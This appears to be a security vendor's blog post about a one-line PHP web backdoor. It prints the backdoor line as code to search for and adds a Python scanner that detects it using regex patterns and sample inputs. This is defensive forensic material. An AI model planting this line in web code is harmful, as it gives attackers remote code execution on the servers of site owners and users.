We, the Forensics team at Foregenix, see all kinds of malware and malicious code on a daily basis.
More recently we have seen an influx of backdoor scripts.
However, this particular script is not just your average Joe Bloggs backdoor. This script implements just a single PHP function to execute code, using a single line of PHP.
This script may not be as heavily featured as many of the notorious web shells out there, but size isn't everything where this script is concerned. Attackers are able to use this one-line script to view, edit and upload files within your environment.
What does this mean? It is extremely hard to identify, amongst the hundreds, if not thousands, of files on your standard web server deployment. It even slides past most AV systems.
However, with our assistance, we can identify malicious scripts on your web server, using technology that includes File Integrity Monitoring (FIM), log analysis, and a Web Application Firewall (WAF).
The code to search for: @extract($_REQUEST); @die($ctime($atime));
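An added example, not Foregenix's own tooling: a Python scanner that flags the pattern above, going slightly beyond the exact string by tolerating whitespace changes and the other request superglobals. It relies on how the line works: extract() turns request parameters into variables, so $ctime names the function and $atime its argument. The file suffix list and the sample inputs are assumptions constructed for illustration.

```python
import re
from pathlib import Path

# extract() applied directly to a request superglobal (whitespace tolerant).
EXTRACT_RE = re.compile(r"\bextract\s*\(\s*\$_(?:REQUEST|GET|POST|COOKIE)\b", re.I)
# A variable used as a function name, e.g. $ctime(...).
VARCALL_RE = re.compile(r"\$[A-Za-z_]\w*\s*\(")

# Constructed samples: the line from this page, the same code reflowed, benign code.
SAMPLE_ONE_LINE = "<?php @extract($_REQUEST); @die($ctime($atime)); ?>"
SAMPLE_REFLOWED = "<?php\n@extract( $_REQUEST );\n@die( $ctime( $atime ) );\n"
SAMPLE_BENIGN = "<?php\n$rows = extract_rows($db);\necho strtoupper($name);\n"

def scan_source(text):
    """Return (line_no, reason, line) findings for one PHP source string."""
    findings, extract_seen = [], False
    for no, line in enumerate(text.splitlines(), 1):
        if EXTRACT_RE.search(line):
            extract_seen = True
            findings.append((no, "extract-superglobal", line.strip()))
        # Once extract() has run, the request can set any variable, so a
        # variable-function call lets the caller choose the function.
        if extract_seen and VARCALL_RE.search(line):
            findings.append((no, "variable-call-after-extract", line.strip()))
    return findings

def scan_tree(root, suffixes=(".php", ".phtml", ".inc")):
    """Scan PHP-like files under root; the suffix list is an assumption."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            found = scan_source(path.read_text(errors="replace"))
            if found:
                hits[str(path)] = found
    return hits

if __name__ == "__main__":
    for name, src in [("one-line", SAMPLE_ONE_LINE), ("reflowed", SAMPLE_REFLOWED),
                      ("benign", SAMPLE_BENIGN)]:
        print(name, scan_source(src))
```

Call scan_tree() on the web root and review every hit by hand, since legitimate code that calls extract() on request data is flagged as well.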